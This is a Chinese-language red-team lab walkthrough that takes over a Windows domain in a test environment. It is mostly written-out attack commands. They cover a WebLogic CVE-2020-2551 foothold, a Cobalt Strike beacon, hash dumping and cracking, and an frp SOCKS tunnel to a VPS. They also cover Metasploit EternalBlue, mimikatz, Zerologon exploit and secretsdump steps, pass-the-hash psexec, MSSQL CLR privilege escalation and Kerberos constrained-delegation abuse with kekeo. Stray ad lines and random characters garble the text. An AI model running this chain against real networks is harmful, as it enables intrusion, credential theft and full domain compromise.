環(huán)境搭建
web服務(wù)器:
外網(wǎng)IP 192.160.0.100
內(nèi)網(wǎng)IP 10.10.20.12
域內(nèi)機(jī)器win7 :
內(nèi)網(wǎng)IP 10.10.20.7
內(nèi)網(wǎng)IP 10.10.10.7
域內(nèi)服務(wù)器 Mssql:
內(nèi)網(wǎng)IP 10.10.10.18
域控機(jī)器:
內(nèi)網(wǎng)IP 10.10.10.8
1.2000多本網(wǎng)絡(luò)安全系列電子書
2.網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料
3.項目源碼
4.網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux检盼、web安全爬早、攻防方面的視頻
5.網(wǎng)絡(luò)安全學(xué)習(xí)路線圖
外網(wǎng)滲透
端口掃描
搭建好環(huán)境想诅,對目標(biāo)192.168.0.100進(jìn)行端口掃描探測
目錄掃描
發(fā)現(xiàn)目標(biāo)開放了7001端口个唧,進(jìn)行目錄掃描探測钥顽,發(fā)現(xiàn)weblogic登錄口
weblogic漏洞利用
嘗試weblogic弱口令登錄不成功
通過weblogic漏洞利用工具坟冲,發(fā)現(xiàn)目標(biāo)存在CVE-2020-2551漏洞可以利用
出網(wǎng)探測
ping www.baidu.com發(fā)現(xiàn)目標(biāo)機(jī)器出網(wǎng)
殺軟識別
tasklist /svc 通過進(jìn)程對比發(fā)現(xiàn)主機(jī)上沒有安裝殺軟
直接powershell上線cs
內(nèi)網(wǎng)滲透
信息搜集
通過執(zhí)行命令whoami /all發(fā)現(xiàn)存在雙網(wǎng)卡
密碼憑據(jù)抓取
通過hashdump抓取密碼Administrator ccef208c6485269c20db2cad21734fe7
ntlm hash值為ccef208c6485269c20db2cad21734fe7睛挚,通過cmd5解出明文密碼Admin12345
橫向移動
有了明文密碼我們可以進(jìn)行遠(yuǎn)程登陸邪蛔,但真實環(huán)境中不到萬不得已一般不建議執(zhí)行此操作,因此尋找其他的方法進(jìn)行內(nèi)網(wǎng)橫向移動
通過上傳fscan掃描10網(wǎng)段扎狱,發(fā)現(xiàn)存在ms17-010漏洞的10.10.20.7主機(jī)
一開始打算通過Eternalblue直接上線cs侧到,發(fā)現(xiàn)不成功勃教,改用其他方法
項目地址:https://github.com/0xFenrik/Eternalblue
隧道搭建
上傳frp搭建隧道代理
[common]#frpc配置
server_addr = VPS地址
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 1080
plugin = socks5
[common]#frps配置
bind_addr =0.0.0.0
bind_port = 7000
永恒之藍(lán)ms17-010
改用metaspolit,調(diào)用永恒之藍(lán)模塊進(jìn)行攻擊匠抗,成功獲取shell
msf6 > setg Proxies socks5:frps服務(wù)端IP:監(jiān)聽端口
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run
或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080
然后通過proxychains msfconsole啟動
成功后通過mimikatz執(zhí)行creds_all獲取賬戶密碼redteam\saul:admin!@#45
中轉(zhuǎn)上線
由于目標(biāo)機(jī)器win7不出網(wǎng)故源,因此以跳板機(jī)器作為中轉(zhuǎn),新建一個監(jiān)聽器
通過psexec進(jìn)行上線
成功上線后進(jìn)行內(nèi)網(wǎng)掃描汞贸,探測存活主機(jī)绳军,發(fā)現(xiàn)還存在10.10.10.8和10.10.10.18兩臺機(jī)器
通過信息搜集發(fā)現(xiàn)當(dāng)前機(jī)器是在域環(huán)境內(nèi)net user /domain
定位域控
接著定位到域控 net group "domain controllers" /domain
ps:一般來說DNS服務(wù)器就是域控
CVE-2020-1472
影響版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
通過CVE-2020-1472腳本進(jìn)行檢測
項目地址:https://github.com/SecuraBV/CVE-2020-1472
1、重置管理員密鑰矢腻,進(jìn)行置空
python3 cve-2020-1472-exploit.py OWA 10.10.10.8
2门驾、通過 Dcsync 查看密碼hash
python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass
3、通過psexec和hash獲取域控權(quán)限
python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
4多柑、使用secretsdump解析保存在本地的nt hash
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
5猎唁、通過reinstall腳本將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復(fù)
python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d
約束委派接管域控
1、通過adfind尋找約束委派的用戶顷蟆,發(fā)現(xiàn)為sqlserver的機(jī)器
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
2、通過端口探測發(fā)現(xiàn)sqlserver為10.10.10.18機(jī)器
3腐魂、使用fscan進(jìn)行掃描fscan.exe -h 10.10.10.0/24 sqlserver為弱口令sa/sa
4帐偎、使用工具查看當(dāng)前權(quán)限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
項目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41
5、權(quán)限較低蛔屹,使用以下命令進(jìn)行提權(quán):
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
6削樊、上線CS并抓到sqlserver的密碼redteam\sqlserver Server12345
根據(jù)先前的信息搜集可知 sqlserver 是一個約束委派用戶,可以通過約束委派攻擊來接管域控
項目地址:https://github.com/gentilkiwi/kekeo/releases
1兔毒、利用 kekeo 請求該用戶的 TGT
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2漫贞、然后使用這張 TGT 獲取域機(jī)器的 ST
kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
3、使用 mimikatz 將 ST 導(dǎo)入當(dāng)前會話育叁,運行 mimikatz 進(jìn)行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
4迅脐、成功獲取域控權(quán)限
最后